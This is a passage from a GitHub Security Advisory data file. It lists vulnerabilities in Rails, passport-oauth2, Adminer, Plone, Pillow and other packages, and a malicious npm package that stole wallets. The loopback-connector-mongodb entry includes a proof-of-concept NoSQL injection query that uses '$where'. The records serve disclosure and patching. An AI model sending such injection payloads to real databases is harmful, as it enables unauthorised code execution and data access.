'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'https://github.com/FasterXML/jackson-databind/issues/2052', 'https://access.redhat.com/errata/RHSA-2019:3002', 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062', 'https://access.redhat.com/errata/RHSA-2019:2858', 'https://access.redhat.com/errata/RHSA-2019:0877', 'https://access.redhat.com/errata/RHSA-2019:3149', 'https://access.redhat.com/errata/RHSA-2019:3140', 'https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf', 'https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html', 'https://access.redhat.com/errata/RHSA-2019:1823', 'https://security.netapp.com/advisory/ntap-20190530-0003/', 'https://bugzilla.redhat.com/show_bug.cgi?id=1671098', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://access.redhat.com/errata/RHSA-2019:1797', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZEDLDUYBSTDY4GWDBUXGJNS2RFYTFVRC/', 'https://access.redhat.com/errata/RHSA-2019:1822', 'https://access.redhat.com/errata/RHSA-2019:1782', 'https://access.redhat.com/errata/RHSA-2019:1106'} | null |
GHSA | GHSA-xp6v-qx65-4pp7 | Data races in gfwx | An issue was discovered in the gfwx crate before 0.3.0 for Rust. Because ImageChunkMut does not have bounds on its Send trait or Sync trait, a data race and memory corruption can occur. | {'CVE-2020-36211'} | 2021-08-25T20:50:39Z | 2021-08-25T20:50:39Z | HIGH | 7 | {'CWE-662', 'CWE-787'} | {'https://github.com/advisories/GHSA-xp6v-qx65-4pp7', 'https://rustsec.org/advisories/RUSTSEC-2020-0104.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36211', 'https://github.com/Devolutions/gfwx-rs/issues/7'} | null |
GHSA | GHSA-c6qr-h5vq-59jc | Untrusted users can run pending migrations in production in Rails | There is a vulnerability in versions of Rails prior to 6.0.3.2 that allowed
an untrusted user to run any pending migrations on a Rails app running in
production.
This vulnerability has been assigned the CVE identifier CVE-2020-8185.
Versions Affected: 6.0.0 < rails < 6.0.3.2
Not affected: Applications with `config.action_dispatch.show_exceptions = false` (this is not a default setting in production)
Fixed Versions: rails >= 6.0.3.2
Impact
------
Using this issue, an attacker would be able to execute any migrations that
are pending for a Rails app running in production mode. It is important to
note that an attacker is limited to running migrations the application
developer has already defined in their application and ones that have not
already ran.
Workarounds
-----------
Until such time as the patch can be applied, application developers should
disable the ActionDispatch middleware in their production environment via
a line such as this one in their config/environment/production.rb:
`config.middleware.delete ActionDispatch::ActionableExceptions` | {'CVE-2020-8185'} | 2021-10-22T14:00:01Z | 2020-06-24T17:40:33Z | MODERATE | 6.5 | {'CWE-400'} | {'https://github.com/rails/rails/commit/2121b9d20b60ed503aa041ef7b926d331ed79fc2', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJ7NUWXAEVRQCROIIBV4C6WXO6IR3KSB/', 'https://groups.google.com/g/rubyonrails-security/c/pAe9EV8gbM0', 'https://github.com/advisories/GHSA-c6qr-h5vq-59jc', 'https://hackerone.com/reports/899069', 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2020-8185.yml', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8185'} | null |
GHSA | GHSA-f794-r6xc-hf3v | Improper Access Control in passport-oauth2 | The passport-oauth2 package before 1.6.1 for Node.js mishandles the error condition of failure to obtain an access token. This is exploitable in certain use cases where an OAuth identity provider uses an HTTP 200 status code for authentication-failure error reports, and an application grants authorization upon simply receiving the access token (i.e., does not try to use the token). NOTE: the passport-oauth2 vendor does not consider this a passport-oauth2 vulnerability. | {'CVE-2021-41580'} | 2021-10-06T13:23:09Z | 2021-09-29T17:18:32Z | MODERATE | 5.3 | {'CWE-287'} | {'https://github.com/jaredhanson/passport-oauth2/compare/v1.6.0...v1.6.1', 'https://github.com/jaredhanson/passport-oauth2/commit/8e3bcdff145a2219033bd782fc517229fe3e05ea', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41580', 'https://github.com/jaredhanson/passport-oauth2/pull/144', 'https://github.com/advisories/GHSA-f794-r6xc-hf3v', 'https://medium.com/passportjs/no-access-token-no-service-7fb017c9e262'} | null |
GHSA | GHSA-m734-r4g6-34f9 | NoSQL Injection in loopback-connector-mongodb | Versions of `loopback-connector-mongodb` before 3.6.0 are vulnerable to NoSQL injection.
MongoDB Connector for LoopBack fails to properly sanitize a filter passed to query the database by allowing the dangerous `$where` property to be passed to the MongoDB Driver. The Driver allows the special `$where` property in a filter to execute JavaScript (client can pass in a malicious script) on the database Driver. This is an [intended feature of MongoDB](https://docs.mongodb.com/manual/core/server-side-javascript/) unless disabled ([instructions here](https://docs.mongodb.com/manual/core/server-side-javascript/#disable-server-side-js)).
A proof of concept malicious query:
```
GET /POST filter={"where": {"$where": "function(){sleep(5000); return this.title.contains('Hello');}"}}
```
The above makes the database sleep for 5 seconds and then returns all “Posts” with the title containing the word `Hello`.
## Recommendation
Update to version 3.6.0 or later. | null | 2021-08-04T20:48:00Z | 2019-06-04T19:36:17Z | HIGH | 0 | {'CWE-89'} | {'https://github.com/strongloop/loopback-connector-mongodb/issues/403', 'https://github.com/strongloop/loopback-connector-mongodb/pull/452', 'https://github.com/advisories/GHSA-m734-r4g6-34f9', 'https://loopback.io/doc/en/lb3/Security-advisory-08-15-2018.html', 'https://github.com/strongloop/loopback-connector-mongodb/commit/ee24cd08b8ccc32711264831c71b1da628df357b', 'https://www.npmjs.com/advisories/696'} | null |
GHSA | GHSA-rrj3-qmh8-72pf | Sensitive Data In Log Files in grunt-gh-pages | Versions of `grunt-gh-pages` prior to 1.0.0 are affected by a vulnerability which may cause unencrypted github credentials to be written to a log file in certain circumstances.
In the `grunt-gh-pages` deployment scenario where authentication is performed by injecting a github token directly into the auth portion of the URL, `grunt-gh-pages` will write the token to a log file, unencrypted.
## Recommendation
Update to version 1.0.0 or later. | {'CVE-2016-10526'} | 2021-01-08T01:57:52Z | 2019-02-18T23:39:11Z | MODERATE | 0 | {'CWE-391'} | {'https://github.com/advisories/GHSA-rrj3-qmh8-72pf', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10526', 'https://www.npmjs.com/advisories/85', 'https://github.com/tschaub/grunt-gh-pages/pull/41', 'https://nodesecurity.io/advisories/85'} | null |
GHSA | GHSA-x5r2-hj5c-8jx6 | SSRF in adminer | ### Impact
Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.
### Patches
Patched by ccd2374b, included in version [4.7.9](https://github.com/vrana/adminer/releases/tag/v4.7.9).
### Workarounds
* Use a single driver version (e.g. `adminer-mysql.php`).
* Protect access to Adminer also by other means, e.g. by HTTP password, IP address limiting or by OTP [plugin](https://www.adminer.org/plugins/).
### References
https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
### For more information
If you have any questions or comments about this advisory:
* Comment at ccd2374b. | {'CVE-2021-21311'} | 2022-04-19T19:02:47Z | 2021-02-11T20:42:59Z | HIGH | 7.2 | {'CWE-918'} | {'https://lists.debian.org/debian-lts-announce/2021/03/msg00002.html', 'https://packagist.org/packages/vrana/adminer', 'https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6', 'https://sourceforge.net/p/adminer/news/2021/02/adminer-479-released/', 'https://github.com/advisories/GHSA-x5r2-hj5c-8jx6', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21311', 'https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf', 'https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351'} | null |
GHSA | GHSA-533p-cp2g-99wp | snipe-it is vulnerable to Cross-Site Request Forgery (CSRF) | snipe-it is vulnerable to Cross-Site Request Forgery (CSRF). | {'CVE-2021-3931'} | 2021-11-17T21:12:48Z | 2021-11-15T23:19:09Z | MODERATE | 4.3 | {'CWE-352'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-3931', 'https://github.com/advisories/GHSA-533p-cp2g-99wp', 'https://huntr.dev/bounties/03b21d69-3bf5-4b2f-a2cf-872dd677a68f', 'https://github.com/snipe/snipe-it/commit/0d811d067c8e064252c0143c39d6cd4c3133679e'} | null |
GHSA | GHSA-rmpv-rcp6-v8wc | Cross-site scripting in Plone | Plone through 5.2.4 allows XSS via a full name that is mishandled during rendering of the ownership tab of a content item. | {'CVE-2021-33508'} | 2021-06-08T23:20:11Z | 2021-06-08T23:20:11Z | MODERATE | 5.4 | {'CWE-79'} | {'http://www.openwall.com/lists/oss-security/2021/05/22/1', 'https://github.com/advisories/GHSA-rmpv-rcp6-v8wc', 'https://plone.org/security/hotfix/20210518/stored-xss-from-user-fullname', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33508'} | null |
GHSA | GHSA-3c5c-7235-994j | Moderate severity vulnerability that affects Pillow | Buffer overflow in the ImagingPcdDecode function in PcdDecode.c in Pillow before 3.1.1 and Python Imaging Library (PIL) 1.1.7 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PhotoCD file. | {'CVE-2016-2533'} | 2021-08-31T20:56:21Z | 2018-07-24T20:15:13Z | MODERATE | 6.5 | {'CWE-119'} | {'http://www.openwall.com/lists/oss-security/2016/02/02/5', 'http://www.debian.org/security/2016/dsa-3499', 'https://github.com/advisories/GHSA-3c5c-7235-994j', 'https://security.gentoo.org/glsa/201612-52', 'http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html', 'http://www.openwall.com/lists/oss-security/2016/02/22/2', 'https://github.com/python-pillow/Pillow/commit/5bdf54b5a76b54fb00bd05f2d733e0a4173eefc9#diff-8ff6909c159597e22288ad818938fd6b', 'https://nvd.nist.gov/vuln/detail/CVE-2016-2533', 'https://github.com/python-pillow/Pillow/pull/1706', 'https://github.com/python-pillow/Pillow/blob/c3cb690fed5d4bf0c45576759de55d054916c165/CHANGES.rst', 'https://github.com/python-pillow/Pillow/commit/ae453aa18b66af54e7ff716f4ccb33adca60afd4#diff-8ff6909c159597e22288ad818938fd6b'} | null |
GHSA | GHSA-hm6q-r2jc-cpqh | Malicious Package in lodahs | All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | {'CVE-2019-19771'} | 2021-07-28T16:49:23Z | 2019-12-16T19:29:33Z | HIGH | 8.8 | {'CWE-20'} | {'https://www.npmjs.com/advisories/1417', 'https://www.npmjs.com/package/lodahs', 'https://nvd.nist.gov/vuln/detail/CVE-2019-19771', 'https://github.com/advisories/GHSA-hm6q-r2jc-cpqh'} | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.